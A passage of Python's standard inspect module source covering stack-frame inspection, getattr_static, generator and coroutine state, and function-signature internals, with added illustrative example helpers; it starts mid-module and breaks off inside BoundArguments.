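# Illustrative sketch (not part of the original module): getclosurevars()
# sorts the names a closure refers to into nonlocal, global, builtin and
# unbound groups.  All names below are hypothetical.
def _example_getclosurevars():
    spam = 99                  # captured as a nonlocal by the closure below
    def inner():
        # 'missing_name' is deliberately unresolved; inner() is never called.
        return spam + len("eggs") + missing_name
    cv = getclosurevars(inner)
    # cv.nonlocals == {'spam': 99}
    # cv.builtins  == {'len': <built-in function len>}
    # cv.unbound   == {'missing_name'}
    return cv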
# -------------------------------------------------- stack frame extraction
Traceback = namedtuple('Traceback', 'filename lineno function code_context index')
def getframeinfo(frame, context=1):
"""Get information about a frame or traceback object.
A tuple of five things is returned: the filename, the line number of
the current line, the function name, a list of lines of context from
the source code, and the index of the current line within that list.
The optional second argument specifies the number of lines of context
to return, which are centered around the current line."""
if istraceback(frame):
lineno = frame.tb_lineno
frame = frame.tb_frame
else:
lineno = frame.f_lineno
if not isframe(frame):
raise TypeError('{!r} is not a frame or traceback object'.format(frame))
filename = getsourcefile(frame) or getfile(frame)
if context > 0:
start = lineno - 1 - context//2
try:
lines, lnum = findsource(frame)
except OSError:
lines = index = None
else:
start = max(0, min(start, len(lines) - context))
lines = lines[start:start+context]
index = lineno - 1 - start
else:
lines = index = None
return Traceback(filename, lineno, frame.f_code.co_name, lines, index)
def getlineno(frame):
"""Get the line number from a frame object, allowing for optimization."""
# FrameType.f_lineno is now a descriptor that grovels co_lnotab
return frame.f_lineno
FrameInfo = namedtuple('FrameInfo', ('frame',) + Traceback._fields)
def getouterframes(frame, context=1):
"""Get a list of records for a frame and all higher (calling) frames.
Each record contains a frame object, filename, line number, function
name, a list of lines of context, and index within the context."""
framelist = []
while frame:
frameinfo = (frame,) + getframeinfo(frame, context)
framelist.append(FrameInfo(*frameinfo))
frame = frame.f_back
return framelist
def getinnerframes(tb, context=1):
"""Get a list of records for a traceback's frame and all lower frames.
Each record contains a frame object, filename, line number, function
name, a list of lines of context, and index within the context."""
framelist = []
while tb:
frameinfo = (tb.tb_frame,) + getframeinfo(tb, context)
framelist.append(FrameInfo(*frameinfo))
tb = tb.tb_next
return framelist
def currentframe():
"""Return the frame of the caller or None if this is not possible."""
return sys._getframe(1) if hasattr(sys, "_getframe") else None
def stack(context=1):
"""Return a list of records for the stack above the caller's frame."""
return getouterframes(sys._getframe(1), context)
def trace(context=1):
"""Return a list of records for the stack below the current exception."""
return getinnerframes(sys.exc_info()[2], context)
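# Illustrative sketch (not part of the original module): inspecting the
# running call stack with getframeinfo() and stack().  The helper name is
# hypothetical.
def _example_frame_introspection():
    info = getframeinfo(currentframe())
    # info.filename, info.lineno and info.function describe this very frame;
    # info.code_context is a one-line list when the source file can be found.
    caller = stack()[1]        # FrameInfo record for whoever called us
    return info.function, caller.function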
# ------------------------------------------------ static version of getattr
_sentinel = object()
def _static_getmro(klass):
return type.__dict__['__mro__'].__get__(klass)
def _check_instance(obj, attr):
instance_dict = {}
try:
instance_dict = object.__getattribute__(obj, "__dict__")
except AttributeError:
pass
return dict.get(instance_dict, attr, _sentinel)
def _check_class(klass, attr):
for entry in _static_getmro(klass):
if _shadowed_dict(type(entry)) is _sentinel:
try:
return entry.__dict__[attr]
except KeyError:
pass
return _sentinel
def _is_type(obj):
try:
_static_getmro(obj)
except TypeError:
return False
return True
def _shadowed_dict(klass):
dict_attr = type.__dict__["__dict__"]
for entry in _static_getmro(klass):
try:
class_dict = dict_attr.__get__(entry)["__dict__"]
except KeyError:
pass
else:
if not (type(class_dict) is types.GetSetDescriptorType and
class_dict.__name__ == "__dict__" and
class_dict.__objclass__ is entry):
return class_dict
return _sentinel
def getattr_static(obj, attr, default=_sentinel):
"""Retrieve attributes without triggering dynamic lookup via the
descriptor protocol, __getattr__ or __getattribute__.
Note: this function may not be able to retrieve all attributes
that getattr can fetch (like dynamically created attributes)
and may find attributes that getattr can't (like descriptors
that raise AttributeError). It can also return descriptor objects
instead of instance members in some cases. See the
documentation for details.
"""
instance_result = _sentinel
if not _is_type(obj):
klass = type(obj)
dict_attr = _shadowed_dict(klass)
if (dict_attr is _sentinel or
type(dict_attr) is types.MemberDescriptorType):
instance_result = _check_instance(obj, attr)
else:
klass = obj
klass_result = _check_class(klass, attr)
if instance_result is not _sentinel and klass_result is not _sentinel:
if (_check_class(type(klass_result), '__get__') is not _sentinel and
_check_class(type(klass_result), '__set__') is not _sentinel):
return klass_result
if instance_result is not _sentinel:
return instance_result
if klass_result is not _sentinel:
return klass_result
if obj is klass:
# for types we check the metaclass too
for entry in _static_getmro(type(klass)):
if _shadowed_dict(type(entry)) is _sentinel:
try:
return entry.__dict__[attr]
except KeyError:
pass
if default is not _sentinel:
return default
raise AttributeError(attr)
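# Illustrative sketch (not part of the original module): getattr_static()
# returns the raw descriptor instead of invoking it.  The class and attribute
# names below are hypothetical.
def _example_getattr_static():
    class Lazy:
        @property
        def value(self):
            raise RuntimeError("should not be evaluated")
    obj = Lazy()
    raw = getattr_static(obj, 'value')
    # 'raw' is the property object itself; its getter was never called,
    # whereas getattr(obj, 'value') would have raised RuntimeError.
    return isinstance(raw, property)    # True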
# ------------------------------------------------ generator introspection
GEN_CREATED = 'GEN_CREATED'
GEN_RUNNING = 'GEN_RUNNING'
GEN_SUSPENDED = 'GEN_SUSPENDED'
GEN_CLOSED = 'GEN_CLOSED'
def getgeneratorstate(generator):
"""Get current state of a generator-iterator.
Possible states are:
GEN_CREATED: Waiting to start execution.
GEN_RUNNING: Currently being executed by the interpreter.
GEN_SUSPENDED: Currently suspended at a yield expression.
GEN_CLOSED: Execution has completed.
"""
if generator.gi_running:
return GEN_RUNNING
if generator.gi_frame is None:
return GEN_CLOSED
if generator.gi_frame.f_lasti == -1:
return GEN_CREATED
return GEN_SUSPENDED
def getgeneratorlocals(generator):
"""
Get the mapping of generator local variables to their current values.
A dict is returned, with the keys the local variable names and values the
bound values."""
if not isgenerator(generator):
raise TypeError("{!r} is not a Python generator".format(generator))
frame = getattr(generator, "gi_frame", None)
if frame is not None:
return generator.gi_frame.f_locals
else:
return {}
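# Illustrative sketch (not part of the original module): a generator moving
# through the states reported by getgeneratorstate().  Names are hypothetical.
def _example_generator_states():
    def counter():
        total = 0
        while True:
            total += yield total
    gen = counter()
    states = [getgeneratorstate(gen)]          # 'GEN_CREATED'
    next(gen)                                  # run up to the first yield
    states.append(getgeneratorstate(gen))      # 'GEN_SUSPENDED'
    locals_now = getgeneratorlocals(gen)       # {'total': 0}
    gen.close()
    states.append(getgeneratorstate(gen))      # 'GEN_CLOSED'
    return states, locals_now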
# ------------------------------------------------ coroutine introspection
CORO_CREATED = 'CORO_CREATED'
CORO_RUNNING = 'CORO_RUNNING'
CORO_SUSPENDED = 'CORO_SUSPENDED'
CORO_CLOSED = 'CORO_CLOSED'
def getcoroutinestate(coroutine):
"""Get current state of a coroutine object.
Possible states are:
CORO_CREATED: Waiting to start execution.
CORO_RUNNING: Currently being executed by the interpreter.
CORO_SUSPENDED: Currently suspended at an await expression.
CORO_CLOSED: Execution has completed.
"""
if coroutine.cr_running:
return CORO_RUNNING
if coroutine.cr_frame is None:
return CORO_CLOSED
if coroutine.cr_frame.f_lasti == -1:
return CORO_CREATED
return CORO_SUSPENDED
def getcoroutinelocals(coroutine):
"""
Get the mapping of coroutine local variables to their current values.
A dict is returned, with the keys the local variable names and values the
bound values."""
frame = getattr(coroutine, "cr_frame", None)
if frame is not None:
return frame.f_locals
else:
return {}
###############################################################################
### Function Signature Object (PEP 362)
###############################################################################
_WrapperDescriptor = type(type.__call__)
_MethodWrapper = type(all.__call__)
_ClassMethodWrapper = type(int.__dict__['from_bytes'])
_NonUserDefinedCallables = (_WrapperDescriptor,
_MethodWrapper,
_ClassMethodWrapper,
types.BuiltinFunctionType)
def _signature_get_user_defined_method(cls, method_name):
"""Private helper. Checks if ``cls`` has an attribute
named ``method_name`` and returns it only if it is a
pure python function.
"""
try:
meth = getattr(cls, method_name)
except AttributeError:
return
else:
if not isinstance(meth, _NonUserDefinedCallables):
# Once '__signature__' will be added to 'C'-level
# callables, this check won't be necessary
return meth
def _signature_get_partial(wrapped_sig, partial, extra_args=()):
"""Private helper to calculate how 'wrapped_sig' signature will
look like after applying a 'functools.partial' object (or alike)
on it.
"""
old_params = wrapped_sig.parameters
new_params = OrderedDict(old_params.items())
partial_args = partial.args or ()
partial_keywords = partial.keywords or {}
if extra_args:
partial_args = extra_args + partial_args
try:
ba = wrapped_sig.bind_partial(*partial_args, **partial_keywords)
except TypeError as ex:
msg = 'partial object {!r} has incorrect arguments'.format(partial)
raise ValueError(msg) from ex
transform_to_kwonly = False
for param_name, param in old_params.items():
try:
arg_value = ba.arguments[param_name]
except KeyError:
pass
else:
if param.kind is _POSITIONAL_ONLY:
# If positional-only parameter is bound by partial,
# it effectively disappears from the signature
new_params.pop(param_name)
continue
if param.kind is _POSITIONAL_OR_KEYWORD:
if param_name in partial_keywords:
# This means that this parameter, and all parameters
# after it should be keyword-only (and var-positional
# should be removed). Here's why. Consider the following
# function:
# foo(a, b, *args, c):
# pass
#
# "partial(foo, a='spam')" will have the following
# signature: "(*, a='spam', b, c)". Because attempting
# to call that partial with "(10, 20)" arguments will
# raise a TypeError, saying that "a" argument received
# multiple values.
transform_to_kwonly = True
# Set the new default value
new_params[param_name] = param.replace(default=arg_value)
else:
# was passed as a positional argument
new_params.pop(param.name)
continue
if param.kind is _KEYWORD_ONLY:
# Set the new default value
new_params[param_name] = param.replace(default=arg_value)
if transform_to_kwonly:
assert param.kind is not _POSITIONAL_ONLY
if param.kind is _POSITIONAL_OR_KEYWORD:
new_param = new_params[param_name].replace(kind=_KEYWORD_ONLY)
new_params[param_name] = new_param
new_params.move_to_end(param_name)
elif param.kind in (_KEYWORD_ONLY, _VAR_KEYWORD):
new_params.move_to_end(param_name)
elif param.kind is _VAR_POSITIONAL:
new_params.pop(param.name)
return wrapped_sig.replace(parameters=new_params.values())
def _signature_bound_method(sig):
"""Private helper to transform signatures for unbound
functions to bound methods.
"""
params = tuple(sig.parameters.values())
if not params or params[0].kind in (_VAR_KEYWORD, _KEYWORD_ONLY):
raise ValueError('invalid method signature')
kind = params[0].kind
if kind in (_POSITIONAL_OR_KEYWORD, _POSITIONAL_ONLY):
# Drop first parameter:
# '(p1, p2[, ...])' -> '(p2[, ...])'
params = params[1:]
else:
if kind is not _VAR_POSITIONAL:
# Unless we add a new parameter type we never
# get here
raise ValueError('invalid argument type')
# It's a var-positional parameter.
# Do nothing. '(*args[, ...])' -> '(*args[, ...])'
return sig.replace(parameters=params)
def _signature_is_builtin(obj):
"""Private helper to test if `obj` is a callable that might
support Argument Clinic's __text_signature__ protocol.
"""
return (isbuiltin(obj) or
ismethoddescriptor(obj) or
isinstance(obj, _NonUserDefinedCallables) or
# Can't test 'isinstance(type)' here, as it would
# also be True for regular python classes
obj in (type, object))
def _signature_is_functionlike(obj):
"""Private helper to test if `obj` is a duck type of FunctionType.
A good example of such objects are functions compiled with
Cython, which have all attributes that a pure Python function
would have, but have their code statically compiled.
"""
if not callable(obj) or isclass(obj):
# All function-like objects are obviously callables,
# and not classes.
return False
name = getattr(obj, '__name__', None)
code = getattr(obj, '__code__', None)
defaults = getattr(obj, '__defaults__', _void) # Important to use _void ...
kwdefaults = getattr(obj, '__kwdefaults__', _void) # ... and not None here
annotations = getattr(obj, '__annotations__', None)
return (isinstance(code, types.CodeType) and
isinstance(name, str) and
(defaults is None or isinstance(defaults, tuple)) and
(kwdefaults is None or isinstance(kwdefaults, dict)) and
isinstance(annotations, dict))
def _signature_get_bound_param(spec):
""" Private helper to get first parameter name from a
__text_signature__ of a builtin method, which should
be in the following format: '($param1, ...)'.
Assumptions are that the first argument won't have
a default value or an annotation.
"""
assert spec.startswith('($')
pos = spec.find(',')
if pos == -1:
pos = spec.find(')')
cpos = spec.find(':')
assert cpos == -1 or cpos > pos
cpos = spec.find('=')
assert cpos == -1 or cpos > pos
return spec[2:pos]
def _signature_strip_non_python_syntax(signature):
"""
Private helper function. Takes a signature in Argument Clinic's
extended signature format.
Returns a tuple of three things:
* that signature re-rendered in standard Python syntax,
* the index of the "self" parameter (generally 0), or None if
the function does not have a "self" parameter, and
* the index of the last "positional only" parameter,
or None if the signature has no positional-only parameters.
"""
if not signature:
return signature, None, None
self_parameter = None
last_positional_only = None
lines = [l.encode('ascii') for l in signature.split('\n')]
generator = iter(lines).__next__
token_stream = tokenize.tokenize(generator)
delayed_comma = False
skip_next_comma = False
text = []
add = text.append
current_parameter = 0
OP = token.OP
ERRORTOKEN = token.ERRORTOKEN
# token stream always starts with ENCODING token, skip it
t = next(token_stream)
assert t.type == tokenize.ENCODING
for t in token_stream:
type, string = t.type, t.string
if type == OP:
if string == ',':
if skip_next_comma:
skip_next_comma = False
else:
assert not delayed_comma
delayed_comma = True
current_parameter += 1
continue
if string == '/':
assert not skip_next_comma
assert last_positional_only is None
skip_next_comma = True
last_positional_only = current_parameter - 1
continue
if (type == ERRORTOKEN) and (string == '$'):
assert self_parameter is None
self_parameter = current_parameter
continue
if delayed_comma:
delayed_comma = False
if not ((type == OP) and (string == ')')):
add(', ')
add(string)
if (string == ','):
add(' ')
clean_signature = ''.join(text)
return clean_signature, self_parameter, last_positional_only
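# Illustrative sketch (not part of the original module): what the helper above
# produces for an Argument Clinic style text signature.  The input string is a
# made-up example, not taken from any real builtin.
def _example_strip_non_python_syntax():
    cleaned, self_index, last_pos_only = \
        _signature_strip_non_python_syntax('($self, obj, /, default)')
    # cleaned       == '(self, obj, default)'
    # self_index    == 0   ('$' marked the bound "self" parameter)
    # last_pos_only == 1   ('/' closed the positional-only block after 'obj')
    return cleaned, self_index, last_pos_only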
def _signature_fromstr(cls, obj, s, skip_bound_arg=True):
"""Private helper to parse content of '__text_signature__'
and return a Signature based on it.
"""
# Lazy import ast because it's relatively heavy and
# it's not used for other than this function.
import ast
Parameter = cls._parameter_cls
clean_signature, self_parameter, last_positional_only = \
_signature_strip_non_python_syntax(s)
program = "def foo" + clean_signature + ": pass"
try:
module = ast.parse(program)
except SyntaxError:
module = None
if not isinstance(module, ast.Module):
raise ValueError("{!r} builtin has invalid signature".format(obj))
f = module.body[0]
parameters = []
empty = Parameter.empty
invalid = object()
module = None
module_dict = {}
module_name = getattr(obj, '__module__', None)
if module_name:
module = sys.modules.get(module_name, None)
if module:
module_dict = module.__dict__
sys_module_dict = sys.modules.copy()
def parse_name(node):
assert isinstance(node, ast.arg)
        if node.annotation is not None:
raise ValueError("Annotations are not currently supported")
return node.arg
def wrap_value(s):
try:
value = eval(s, module_dict)
except NameError:
try:
value = eval(s, sys_module_dict)
except NameError:
raise RuntimeError()
if isinstance(value, str):
return ast.Str(value)
if isinstance(value, (int, float)):
return ast.Num(value)
if isinstance(value, bytes):
return ast.Bytes(value)
if value in (True, False, None):
return ast.NameConstant(value)
raise RuntimeError()
class RewriteSymbolics(ast.NodeTransformer):
def visit_Attribute(self, node):
a = []
n = node
while isinstance(n, ast.Attribute):
a.append(n.attr)
n = n.value
if not isinstance(n, ast.Name):
raise RuntimeError()
a.append(n.id)
value = ".".join(reversed(a))
return wrap_value(value)
def visit_Name(self, node):
if not isinstance(node.ctx, ast.Load):
raise ValueError()
return wrap_value(node.id)
def p(name_node, default_node, default=empty):
name = parse_name(name_node)
if name is invalid:
return None
if default_node and default_node is not _empty:
try:
default_node = RewriteSymbolics().visit(default_node)
o = ast.literal_eval(default_node)
except ValueError:
o = invalid
if o is invalid:
return None
default = o if o is not invalid else default
parameters.append(Parameter(name, kind, default=default, annotation=empty))
# non-keyword-only parameters
args = reversed(f.args.args)
defaults = reversed(f.args.defaults)
iter = itertools.zip_longest(args, defaults, fillvalue=None)
if last_positional_only is not None:
kind = Parameter.POSITIONAL_ONLY
else:
kind = Parameter.POSITIONAL_OR_KEYWORD
for i, (name, default) in enumerate(reversed(list(iter))):
p(name, default)
if i == last_positional_only:
kind = Parameter.POSITIONAL_OR_KEYWORD
# *args
if f.args.vararg:
kind = Parameter.VAR_POSITIONAL
p(f.args.vararg, empty)
# keyword-only arguments
kind = Parameter.KEYWORD_ONLY
for name, default in zip(f.args.kwonlyargs, f.args.kw_defaults):
p(name, default)
# **kwargs
if f.args.kwarg:
kind = Parameter.VAR_KEYWORD
p(f.args.kwarg, empty)
if self_parameter is not None:
# Possibly strip the bound argument:
# - We *always* strip first bound argument if
# it is a module.
# - We don't strip first bound argument if
# skip_bound_arg is False.
assert parameters
_self = getattr(obj, '__self__', None)
self_isbound = _self is not None
self_ismodule = ismodule(_self)
if self_isbound and (self_ismodule or skip_bound_arg):
parameters.pop(0)
else:
# for builtins, self parameter is always positional-only!
p = parameters[0].replace(kind=Parameter.POSITIONAL_ONLY)
parameters[0] = p
return cls(parameters, return_annotation=cls.empty)
def _signature_from_builtin(cls, func, skip_bound_arg=True):
"""Private helper function to get signature for
builtin callables.
"""
if not _signature_is_builtin(func):
raise TypeError("{!r} is not a Python builtin "
"function".format(func))
s = getattr(func, "__text_signature__", None)
if not s:
raise ValueError("no signature found for builtin {!r}".format(func))
return _signature_fromstr(cls, func, s, skip_bound_arg)
def _signature_from_function(cls, func):
"""Private helper: constructs Signature for the given python function."""
is_duck_function = False
if not isfunction(func):
if _signature_is_functionlike(func):
is_duck_function = True
else:
# If it's not a pure Python function, and not a duck type
# of pure function:
raise TypeError('{!r} is not a Python function'.format(func))
Parameter = cls._parameter_cls
# Parameter information.
func_code = func.__code__
pos_count = func_code.co_argcount
arg_names = func_code.co_varnames
positional = tuple(arg_names[:pos_count])
keyword_only_count = func_code.co_kwonlyargcount
keyword_only = arg_names[pos_count:(pos_count + keyword_only_count)]
annotations = func.__annotations__
defaults = func.__defaults__
kwdefaults = func.__kwdefaults__
if defaults:
pos_default_count = len(defaults)
else:
pos_default_count = 0
parameters = []
# Non-keyword-only parameters w/o defaults.
non_default_count = pos_count - pos_default_count
for name in positional[:non_default_count]:
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_POSITIONAL_OR_KEYWORD))
# ... w/ defaults.
for offset, name in enumerate(positional[non_default_count:]):
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_POSITIONAL_OR_KEYWORD,
default=defaults[offset]))
# *args
if func_code.co_flags & CO_VARARGS:
name = arg_names[pos_count + keyword_only_count]
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_VAR_POSITIONAL))
# Keyword-only parameters.
for name in keyword_only:
default = _empty
if kwdefaults is not None:
default = kwdefaults.get(name, _empty)
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_KEYWORD_ONLY,
default=default))
# **kwargs
if func_code.co_flags & CO_VARKEYWORDS:
index = pos_count + keyword_only_count
if func_code.co_flags & CO_VARARGS:
index += 1
name = arg_names[index]
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_VAR_KEYWORD))
    # If 'func' is a pure Python function, don't validate the
# parameters list (for correct order and defaults), it should be OK.
return cls(parameters,
return_annotation=annotations.get('return', _empty),
__validate_parameters__=is_duck_function)
def _signature_from_callable(obj, *,
follow_wrapper_chains=True,
skip_bound_arg=True,
sigcls):
"""Private helper function to get signature for arbitrary
callable objects.
"""
if not callable(obj):
raise TypeError('{!r} is not a callable object'.format(obj))
if isinstance(obj, types.MethodType):
# In this case we skip the first parameter of the underlying
# function (usually `self` or `cls`).
sig = _signature_from_callable(
obj.__func__,
follow_wrapper_chains=follow_wrapper_chains,
skip_bound_arg=skip_bound_arg,
sigcls=sigcls)
if skip_bound_arg:
return _signature_bound_method(sig)
else:
return sig
# Was this function wrapped by a decorator?
if follow_wrapper_chains:
obj = unwrap(obj, stop=(lambda f: hasattr(f, "__signature__")))
if isinstance(obj, types.MethodType):
# If the unwrapped object is a *method*, we might want to
# skip its first parameter (self).
# See test_signature_wrapped_bound_method for details.
return _signature_from_callable(
obj,
follow_wrapper_chains=follow_wrapper_chains,
skip_bound_arg=skip_bound_arg,
sigcls=sigcls)
try:
sig = obj.__signature__
except AttributeError:
pass
else:
if sig is not None:
if not isinstance(sig, Signature):
raise TypeError(
'unexpected object {!r} in __signature__ '
'attribute'.format(sig))
return sig
try:
partialmethod = obj._partialmethod
except AttributeError:
pass
else:
if isinstance(partialmethod, functools.partialmethod):
# Unbound partialmethod (see functools.partialmethod)
# This means, that we need to calculate the signature
# as if it's a regular partial object, but taking into
# account that the first positional argument
# (usually `self`, or `cls`) will not be passed
# automatically (as for boundmethods)
wrapped_sig = _signature_from_callable(
partialmethod.func,
follow_wrapper_chains=follow_wrapper_chains,
skip_bound_arg=skip_bound_arg,
sigcls=sigcls)
sig = _signature_get_partial(wrapped_sig, partialmethod, (None,))
first_wrapped_param = tuple(wrapped_sig.parameters.values())[0]
if first_wrapped_param.kind is Parameter.VAR_POSITIONAL:
# First argument of the wrapped callable is `*args`, as in
# `partialmethod(lambda *args)`.
return sig
else:
sig_params = tuple(sig.parameters.values())
assert (not sig_params or
first_wrapped_param is not sig_params[0])
new_params = (first_wrapped_param,) + sig_params
return sig.replace(parameters=new_params)
if isfunction(obj) or _signature_is_functionlike(obj):
# If it's a pure Python function, or an object that is duck type
# of a Python function (Cython functions, for instance), then:
return _signature_from_function(sigcls, obj)
if _signature_is_builtin(obj):
return _signature_from_builtin(sigcls, obj,
skip_bound_arg=skip_bound_arg)
if isinstance(obj, functools.partial):
wrapped_sig = _signature_from_callable(
obj.func,
follow_wrapper_chains=follow_wrapper_chains,
skip_bound_arg=skip_bound_arg,
sigcls=sigcls)
return _signature_get_partial(wrapped_sig, obj)
sig = None
if isinstance(obj, type):
# obj is a class or a metaclass
# First, let's see if it has an overloaded __call__ defined
# in its metaclass
call = _signature_get_user_defined_method(type(obj), '__call__')
if call is not None:
sig = _signature_from_callable(
call,
follow_wrapper_chains=follow_wrapper_chains,
skip_bound_arg=skip_bound_arg,
sigcls=sigcls)
else:
# Now we check if the 'obj' class has a '__new__' method
new = _signature_get_user_defined_method(obj, '__new__')
if new is not None:
sig = _signature_from_callable(
new,
follow_wrapper_chains=follow_wrapper_chains,
skip_bound_arg=skip_bound_arg,
sigcls=sigcls)
else:
# Finally, we should have at least __init__ implemented
init = _signature_get_user_defined_method(obj, '__init__')
if init is not None:
sig = _signature_from_callable(
init,
follow_wrapper_chains=follow_wrapper_chains,
skip_bound_arg=skip_bound_arg,
sigcls=sigcls)
if sig is None:
# At this point we know, that `obj` is a class, with no user-
# defined '__init__', '__new__', or class-level '__call__'
for base in obj.__mro__[:-1]:
# Since '__text_signature__' is implemented as a
# descriptor that extracts text signature from the
# class docstring, if 'obj' is derived from a builtin
# class, its own '__text_signature__' may be 'None'.
# Therefore, we go through the MRO (except the last
# class in there, which is 'object') to find the first
# class with non-empty text signature.
try:
text_sig = base.__text_signature__
except AttributeError:
pass
else:
if text_sig:
# If 'obj' class has a __text_signature__ attribute:
# return a signature based on it
return _signature_fromstr(sigcls, obj, text_sig)
# No '__text_signature__' was found for the 'obj' class.
# Last option is to check if its '__init__' is
# object.__init__ or type.__init__.
if type not in obj.__mro__:
# We have a class (not metaclass), but no user-defined
# __init__ or __new__ for it
if (obj.__init__ is object.__init__ and
obj.__new__ is object.__new__):
# Return a signature of 'object' builtin.
return signature(object)
else:
raise ValueError(
'no signature found for builtin type {!r}'.format(obj))
elif not isinstance(obj, _NonUserDefinedCallables):
# An object with __call__
# We also check that the 'obj' is not an instance of
# _WrapperDescriptor or _MethodWrapper to avoid
# infinite recursion (and even potential segfault)
call = _signature_get_user_defined_method(type(obj), '__call__')
if call is not None:
try:
sig = _signature_from_callable(
call,
follow_wrapper_chains=follow_wrapper_chains,
skip_bound_arg=skip_bound_arg,
sigcls=sigcls)
except ValueError as ex:
msg = 'no signature found for {!r}'.format(obj)
raise ValueError(msg) from ex
if sig is not None:
# For classes and objects we skip the first parameter of their
# __call__, __new__, or __init__ methods
if skip_bound_arg:
return _signature_bound_method(sig)
else:
return sig
if isinstance(obj, types.BuiltinFunctionType):
# Raise a nicer error message for builtins
msg = 'no signature found for builtin function {!r}'.format(obj)
raise ValueError(msg)
raise ValueError('callable {!r} is not supported by signature'.format(obj))
class _void:
"""A private marker - used in Parameter & Signature."""
class _empty:
"""Marker object for Signature.empty and Parameter.empty."""
class _ParameterKind(enum.IntEnum):
POSITIONAL_ONLY = 0
POSITIONAL_OR_KEYWORD = 1
VAR_POSITIONAL = 2
KEYWORD_ONLY = 3
VAR_KEYWORD = 4
def __str__(self):
return self._name_
_POSITIONAL_ONLY = _ParameterKind.POSITIONAL_ONLY
_POSITIONAL_OR_KEYWORD = _ParameterKind.POSITIONAL_OR_KEYWORD
_VAR_POSITIONAL = _ParameterKind.VAR_POSITIONAL
_KEYWORD_ONLY = _ParameterKind.KEYWORD_ONLY
_VAR_KEYWORD = _ParameterKind.VAR_KEYWORD
_PARAM_NAME_MAPPING = {
_POSITIONAL_ONLY: 'positional-only',
_POSITIONAL_OR_KEYWORD: 'positional or keyword',
_VAR_POSITIONAL: 'variadic positional',
_KEYWORD_ONLY: 'keyword-only',
_VAR_KEYWORD: 'variadic keyword'
}
_get_paramkind_descr = _PARAM_NAME_MAPPING.__getitem__
class Parameter:
"""Represents a parameter in a function signature.
Has the following public attributes:
* name : str
The name of the parameter as a string.
* default : object
The default value for the parameter if specified. If the
parameter has no default value, this attribute is set to
`Parameter.empty`.
* annotation
The annotation for the parameter if specified. If the
parameter has no annotation, this attribute is set to
`Parameter.empty`.
* kind : str
Describes how argument values are bound to the parameter.
Possible values: `Parameter.POSITIONAL_ONLY`,
`Parameter.POSITIONAL_OR_KEYWORD`, `Parameter.VAR_POSITIONAL`,
`Parameter.KEYWORD_ONLY`, `Parameter.VAR_KEYWORD`.
"""
__slots__ = ('_name', '_kind', '_default', '_annotation')
POSITIONAL_ONLY = _POSITIONAL_ONLY
POSITIONAL_OR_KEYWORD = _POSITIONAL_OR_KEYWORD
VAR_POSITIONAL = _VAR_POSITIONAL
KEYWORD_ONLY = _KEYWORD_ONLY
VAR_KEYWORD = _VAR_KEYWORD
empty = _empty
def __init__(self, name, kind, *, default=_empty, annotation=_empty):
try:
self._kind = _ParameterKind(kind)
except ValueError:
raise ValueError(f'value {kind!r} is not a valid Parameter.kind')
if default is not _empty:
if self._kind in (_VAR_POSITIONAL, _VAR_KEYWORD):
msg = '{} parameters cannot have default values'
msg = msg.format(_get_paramkind_descr(self._kind))
raise ValueError(msg)
self._default = default
self._annotation = annotation
if name is _empty:
raise ValueError('name is a required attribute for Parameter')
if not isinstance(name, str):
msg = 'name must be a str, not a {}'.format(type(name).__name__)
raise TypeError(msg)
if name[0] == '.' and name[1:].isdigit():
# These are implicit arguments generated by comprehensions. In
# order to provide a friendlier interface to users, we recast
# their name as "implicitN" and treat them as positional-only.
# See issue 19611.
if self._kind != _POSITIONAL_OR_KEYWORD:
msg = (
'implicit arguments must be passed as '
'positional or keyword arguments, not {}'
)
msg = msg.format(_get_paramkind_descr(self._kind))
raise ValueError(msg)
self._kind = _POSITIONAL_ONLY
name = 'implicit{}'.format(name[1:])
if not name.isidentifier():
raise ValueError('{!r} is not a valid parameter name'.format(name))
self._name = name
def __reduce__(self):
return (type(self),
(self._name, self._kind),
{'_default': self._default,
'_annotation': self._annotation})
def __setstate__(self, state):
self._default = state['_default']
self._annotation = state['_annotation']
@property
def name(self):
return self._name
@property
def default(self):
return self._default
@property
def annotation(self):
return self._annotation
@property
def kind(self):
return self._kind
def replace(self, *, name=_void, kind=_void,
annotation=_void, default=_void):
"""Creates a customized copy of the Parameter."""
if name is _void:
name = self._name
if kind is _void:
kind = self._kind
if annotation is _void:
annotation = self._annotation
if default is _void:
default = self._default
return type(self)(name, kind, default=default, annotation=annotation)
def __str__(self):
kind = self.kind
formatted = self._name
# Add annotation and default value
if self._annotation is not _empty:
formatted = '{}: {}'.format(formatted,
formatannotation(self._annotation))
if self._default is not _empty:
if self._annotation is not _empty:
formatted = '{} = {}'.format(formatted, repr(self._default))
else:
formatted = '{}={}'.format(formatted, repr(self._default))
if kind == _VAR_POSITIONAL:
formatted = '*' + formatted
elif kind == _VAR_KEYWORD:
formatted = '**' + formatted
return formatted
def __repr__(self):
return '<{} "{}">'.format(self.__class__.__name__, self)
def __hash__(self):
return hash((self.name, self.kind, self.annotation, self.default))
def __eq__(self, other):
if self is other:
return True
if not isinstance(other, Parameter):
return NotImplemented
return (self._name == other._name and
self._kind == other._kind and
self._default == other._default and
self._annotation == other._annotation)
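# Illustrative sketch (not part of the original module): building Parameter
# objects by hand and deriving variants with replace().  Names are
# hypothetical.
def _example_parameter():
    count = Parameter('count', Parameter.POSITIONAL_OR_KEYWORD, default=0)
    # str(count) == 'count=0'
    keyword_only = count.replace(kind=Parameter.KEYWORD_ONLY, annotation=int)
    # str(keyword_only) == 'count: int = 0'
    return count, keyword_only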
class BoundArguments:
"""Result of `Signature.bind` call. Holds the mapping of arguments
to the function's parameters.
Has the following public attributes:
* arguments : OrderedDict
An ordered mutable mapping of parameters' names to arguments' values.
Does not contain arguments' default values.
* signature : Signature
The Signature object that created this instance.
* args : tuple
Tuple of positional arguments values.
* kwargs : dict
Dict of keyword arguments values.
"""
__slots__ = ('arguments', '_signature', '__weakref__')
def __init__(self, signature, arguments):
self.arguments = arguments
self._signature = signature
@property
def signature(self):
return self._signature
@property
def args(self):
args = []
for param_name, param in self._signature.parameters.items():
if param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY):
break
try:
arg = self.arguments[param_name]
except KeyError:
# We're done here. Other arguments
# will be mapped in 'BoundArguments.kwargs'
break
else:
if param.kind == _VAR_POSITIONAL:
# *args
args.extend(arg)
else:
# plain argument
args.append(arg)
return tuple(args)
@property
def kwargs(self):
